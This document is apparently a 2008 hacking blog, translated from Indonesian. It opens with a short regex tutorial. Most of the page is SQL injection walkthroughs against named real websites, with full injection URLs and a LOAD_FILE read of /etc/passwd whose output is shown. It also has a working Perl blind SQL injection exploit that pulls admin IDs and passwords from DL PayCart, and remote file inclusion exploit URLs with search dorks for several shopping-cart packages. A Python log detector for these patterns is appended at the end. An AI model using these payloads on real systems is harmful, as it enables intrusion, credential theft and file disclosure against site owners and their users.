28 February 2008

Learning regular expressions

Learning a little about regular expressions


----------
Assertion
----------
^ = start of the string
$ = end of the string
\b = word boundary
\B = non-word boundary


-----
Atom
-----
. = any character except newline
[] = any one of the characters inside the brackets
[^ ] = any character that is not inside the brackets
| = alternation: one of several possible strings
() = groups a regular expression; the text it matches is captured

----------
Quantifier
----------
* = zero or more instances of the atom
+ = one or more instances of the atom
? = zero or one instance of the atom
{n} = exactly n instances of the atom
{n,} = at least n instances of the atom
{n,m} = at least n and at most m instances of the atom
n-m = a range from n to m (inside a character class)


----------------------------
Symbols / special characters
----------------------------
\d = any digit
\D = any non-digit
\n = newline
\r = carriage return
\t = tab
\f = form feed
\s = whitespace character
\S = non-whitespace character
\w = alphanumeric (word) character
\W = non-alphanumeric character


Let's try applying this in Perl and PHP.

perl

#!/usr/bin/perl
use strict;
use warnings;
# Capture everything after "http://www." up to the end of the string; /i ignores case.
my $url = "http://www.irvian.cn";
if ($url =~ /^http:\/\/www\.(.+)$/i) { print "$1\n"; }
else { die "wrong\n"; }

The output of the program above is irvian.cn


php

<?php
$url = "http://www.irvian.cn";
// eregi() is the case-insensitive POSIX regex match; the first group lands in $hasil[1]
if (@eregi("^http:\/\/www\.(.+)$", $url, $hasil)) {
    echo $hasil[1];
}


The result is the same: irvian.cn
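As an added example (not from the original post), the same pattern in Python's re module next to a stricter one built only from the constructs in the tables above. It shows a point the Perl/PHP snippets do not: the greedy (.+) also swallows any path or query string, so the capture is not a hostname check; the function name capture_host is my own.

```python
import re

# The pattern from the Perl/PHP example above, transcribed for Python's re module.
LOOSE = re.compile(r"^http://www\.(.+)$", re.I)

# A stricter variant built only from constructs in the tables above: alternation for
# the scheme, a character class with a range, a bounded {n,m} quantifier, both anchors.
STRICT = re.compile(r"^(?:http|https)://www\.([a-z0-9-]+(?:\.[a-z0-9-]+){1,3})$", re.I)


def capture_host(url, pattern=LOOSE):
    """Return what group 1 captured, or None when the URL does not match at all."""
    m = pattern.match(url)
    return m.group(1) if m else None


if __name__ == "__main__":
    for url in ("http://www.irvian.cn",
                "http://www.irvian.cn/login.php?next=1",   # greedy (.+) keeps the path
                "HTTPS://WWW.irvian.cn"):                  # LOOSE has no https branch
        print(url, "->", capture_host(url), "|", capture_host(url, STRICT))
```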

SQL injection with LOAD_FILE

This time I try using LOAD_FILE in an SQL injection to read sensitive files.


victim:

http://sonyadakar.com


vuln:
http://sonyadakar.com/products1/content.php?id=-1[sql]


As usual, find the number of columns until the query is true.

(the browser no longer shows an error)


%20union%20select%201,2/*

%20union%20select%201,2,3/*

and so on, up to

%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*

http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*

After that we replace one of the numbers that appear with LOAD_FILE.

The format is LOAD_FILE(/etc/passwd), where /etc/passwd is the path of the file we want to read.

But first, /etc/passwd has to be converted to hex.

The hex of /etc/passwd is 0x2f6574632f706173737764.

We can also substitute another file, for example /etc/issue, and convert it to hex.

The hex of /etc/issue is 0x2F6574632F6973737565.

After converting the file we want to read to hex, let's continue by putting it into the URL:


http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12/*

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
----------------cut-------------------------------

oops.. there you can see the contents of the file ;D

Let's try putting LOAD_FILE(0x2F6574632F6973737565) into the URL:

http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,LOAD_FILE(0x2F6574632F6973737565),3,4,5,6,7,8,9,10,11,12/*

Red Hat Enterprise Linux ES release 4 (Nahant Update 6)
Kernel \r on an \m


27 February 2008

Finding tables and columns in a MySQL target

SQL injection: finding tables and columns in a MySQL target.

Note: this method works if the MySQL version is 5 or higher and information_schema can be read (no access denied).


This time we will exploit the target
http://www.cpme.be


vuln:
http://www.cpme.be/content.php?c=1[sql]


Find the number of columns until the query is true.

SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,2,3,4/*

OK, true. Let's try to find the table names.




SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1/*

With the SQL above we find the 1st table, agenda_international.




Let's look for the 2nd table.



SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%202,1/*

With the SQL above we find the 2nd table, answers.

We can find the 3rd table and so on by incrementing the number in LIMIT.



OK, now that we have the tables, you may ask how to find the columns.

SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,COLUMN_NAME,3,4%20from%20information_schema.COLUMNS%20where%20table_name='forum_users'%20and%20table_schema=database()limit%201,1/*

With the SQL above we find column 1 of the table forum_users, namely username.

By incrementing the number in LIMIT we can find column 2 and so on.



If you feel tired, that's only natural :D so is there a more practical way?

Once again I have made a practical tool. Please try it at


http://209.40.202.204/~irvian/ask.php


DoS with BENCHMARK via SQL injection

This time there is an SQL injection bug on the site astro-nusantara.com.

vuln:
www.astro-nusantara.com/pages/programme.php?channel_id=21[sql]


Playing with SQL injection on a .cfm target

This time we try playing with SQL injection on a .cfm target.

sample target:
http://www.ekklaw.com/ekklaw.cfm?ID=[sql]

vuln test:
http://www.ekklaw.com/ekklaw.cfm?ID=7'

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near ''.

If we find an error like the one above, we can already draw 2 conclusions:
1. the target is Windows.
2. the target uses an SQL Server database.

OK, let's continue.

Enter the following SQL injection:
http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN('')))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'REFERENTIAL_CONSTRAINTS' to a column of data type int.


The browser shows a very wonderful error ;D
From the error above we find a table, REFERENTIAL_CONSTRAINTS.

So how do we find the 2nd table and so on?

Let's try the following SQL:
http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN('REFERENTIAL_CONSTRAINTS')))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'REFERENTIAL_CONSTRAINTS'.

Here we can see that the table REFERENTIAL_CONSTRAINTS is not found. Why?

The answer is that REFERENTIAL_CONSTRAINTS is a string and the server only reads the table in ASCII form.

So how do we get the server to read the table REFERENTIAL_CONSTRAINTS?

Easy, we just convert REFERENTIAL_CONSTRAINTS from a string to ASCII,

like this:

char(82)%2bchar(69)%2bchar(70)%2bchar(69)%2bchar(82)%2bchar(69)%2bchar(78)%2bchar(84)%2bchar(73)%2bchar(65)%2bchar(76)%2bchar(95)%2bchar(67)%2bchar(79)%2bchar(78)%2bchar(83)%2bchar(84)%2bchar(82)%2bchar(65)%2bchar(73)%2bchar(78)%2bchar(84)%2bchar(83)

The ASCII above, as a string, is REFERENTIAL_CONSTRAINTS.

Let's try inserting the ASCII above into the SQL injection.

http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN(char(82)%2bchar(69)%2bchar(70)%2bchar(69)%2bchar(82)%2bchar(69)%2bchar(78)%2bchar(84)%2bchar(73)%2bchar(65)%2bchar(76)%2bchar(95)%2bchar(67)%2bchar(79)%2bchar(78)%2bchar(83)%2bchar(84)%2bchar(82)%2bchar(65)%2bchar(73)%2bchar(78)%2bchar(84)%2bchar(83))))--


error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'articles' to a column of data type int.

Wow, we got the 2nd table. Next, just continue by adding the table articles, converted to ASCII, to the SQL injection.

If you say you're tired, that's for certain, but I have made a tool in Perl that makes it easier for you.

With this tool, playing with cfm becomes very easy.

If you really need this tool, please contact irvian.info@gmail.com.


26 February 2008

DL PayCart 1.01 Blind Sql Injection

#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts : DL PayCart 1.01 - © 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
#---------------------------------------------------------------------------------

if (@ARGV < 3) {
    die "
use : $0 host option itemid
example : $0 http://victim.com 1 1

1= AdminID
2= AdminPass\n";
}

$url    = $ARGV[0];
$option = $ARGV[1];
$itmid  = $ARGV[2];

print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]DL PayCart 1.01 - © 2006 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";

if ($option eq 1) {
    syswrite(STDOUT, "AdminID: ", 9);
}
elsif ($option eq 2) {
    syswrite(STDOUT, "AdminPass: ", 11);
}

# Positions 1..32 of the selected column, each tried against character codes 32..255.
for ($i = 1; $i <= 32; $i++) {
    $f = 0;
    $n = 32;
    while (!$f && $n <= 255) {
        if (&blind($url, $option, $i, $n, $itmid)) {
            $f = 1;
            syswrite(STDOUT, chr($n), 1);
        }
        $n++;
    }
}

print "\n[+]finish Execution Exploit\n";

# Returns 1 when the response is not the "noimage.gif" page, 0 otherwise.
sub blind {
    my $site = $_[0];
    my $op   = $_[1];
    my $az   = $_[2];
    my $na   = $_[3];
    my $itm  = $_[4];

    if ($op eq 1)    { $klm = "AdminID"; }
    elsif ($op eq 2) { $klm = "AdminPass"; }

    $blind = "$site" . "/viewitem.php?ItemID=" . $itm . "'/**/and/**/substring((select/**/" . "$klm" . "/**/from/**/pc_settings/**/limit/**/0,1)," . "$az" . ",1)=char(" . "$na" . ")/*";

    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    $req = $b->request(HTTP::Request->new(GET => $blind));
    $res = $req->content;

    if ($res !~ /noimage.gif/i) {
        return 1;
    }
    return 0;
}

Pixaria Gallery 1.x RFI

Pixaria Gallery v1.x.x (class.Smarty.php) Remote File Include Vulnerability

---------------------------------------------
# scripts : Pixaria Gallery v1.x.x
# Discovered By : irvian
# scripts site : http://pixaria.com
# dork : inurl:index.gallery.php?gid=
----------------------------------------------

bug found:

/resources/includes/class.Smarty.php

// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");

Exploit:
/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]

PhotoCart 3.9 RFI

-------------------------------------------------------------------
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Dork : inurl :/PhotoCart/
# Bug Found By : irvian
--------------------------------------------------------------------
bug found on /PhotoCart/adminprint.php

include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
adminsessionCheck();


www.target.com/adminprint.php?admin_folder=[evil_scripts]
www.target.com/adminprint.php?path=[evil_scripts]

Jshop Server 1.3 RFI

--------------------------------------------------------------------------
# scripts : Jshop Server 1.3
# Discovered By : irvian
# scripts site : http://www.jshop.co.uk/
# dork : inurl:page.php?xPage=
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]





Sunshop 3.5 RFI

sunshop 3.5 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts : SunShop v3.5
# Discovered By : irvian
# scripts site : http://www.turnkeywebtools.com/sunshop/
# dork : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:


index.php
$abs_path = dirname(__FILE__);
include $abs_path."/global.php";

checkout.php
$abs_path = dirname(__FILE__);
include $abs_path."/global.php";

Exploit:
target.com/index.php?abs_path=[evilcode]
target.com/checkout.php?abs_path=[evilcode]




CS-Cart 1.3.3 RFI

CS-Cart 1.3.3 Remote File Include, session II

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
$$ Script site: http://www.cs-cart.com
$$ Dork: Powered by CS-Cart - Shopping Cart Software
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$ Find by: irvian
$$ Contact: admin@irvian.info
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

$install_dir = dirname(__FILE__);
$install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' : 'skins';
include $install_dir.'/core/install.php';

Expl: http://site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts]
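Added example, not from the original posts: a small Python detector that, run over web-server request paths, flags the request shapes used in the SQL injection walkthroughs and the RFI advisories above, and decodes the 0x hex and char()+char() literals back to the file and table names they hide (LOAD_FILE(0x2f6574632f706173737764) becomes /etc/passwd). The sample request paths are constructed from the payloads quoted on this page with hostnames removed; the marker list, the function names and the TEST-NET address in the remote-include sample are my own choices.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed request paths modelled on the payloads quoted in the posts above
# (hostnames dropped; the remote-include URL uses a TEST-NET address).
SAMPLE_REQUESTS = [
    "/content.php?id=1",
    "/content.php?id=-1%20union%20select%201,LOAD_FILE(0x2f6574632f706173737764),3/*",
    "/content.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1/*",
    "/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN(char(82)%2bchar(69)%2bchar(70))))--",
    "/viewitem.php?ItemID=1'/**/and/**/substring((select/**/AdminID/**/from/**/pc_settings/**/limit/**/0,1),1,1)=char(97)/*",
    "/adminprint.php?path=http://203.0.113.5/evil.txt",
]

# Markers taken from the posts: UNION column counting, LOAD_FILE, information_schema
# enumeration, MSSQL convert() error extraction, per-character blind probing, BENCHMARK.
SQLI_MARKERS = ("union select", "load_file(", "information_schema",
                "convert(int,", "substring((select", "benchmark(")
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})")
CHAR_CHAIN = re.compile(r"(?:char\(\d{1,3}\)\s*\+\s*)*char\(\d{1,3}\)")
REMOTE_URL = re.compile(r"(?:https?|ftp)://", re.I)

def decode_literals(sql):
    """Recover the strings hidden in 0x.. hex literals and char()+char() chains."""
    found = []
    for hexdigits in HEX_LITERAL.findall(sql):
        try:
            found.append(bytes.fromhex(hexdigits).decode("ascii"))
        except ValueError:  # odd length or non-ASCII bytes: not a file or table name
            pass
    for chain in CHAR_CHAIN.findall(sql):
        found.append("".join(chr(int(n)) for n in re.findall(r"\d+", chain)))
    return found

def analyse(request_path):
    """Return (markers hit, decoded literals) for one logged request path."""
    parts = urlsplit(request_path)
    query = unquote_plus(parts.query)                 # %20 -> space, %2b -> +
    sql = re.sub(r"/\*.*?\*/", " ", query.lower())    # /**/ stands in for whitespace
    sql = re.sub(r"\s+", " ", sql)
    hits = [marker for marker in SQLI_MARKERS if marker in sql]
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL.match(value):                   # include path pointing off-host
            hits.append(f"remote include via {key}")
    return hits, decode_literals(sql)

if __name__ == "__main__":
    for path in SAMPLE_REQUESTS:
        hits, literals = analyse(path)
        print("ALERT" if hits else "ok   ", hits, literals, path[:50])
```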

powered by irvian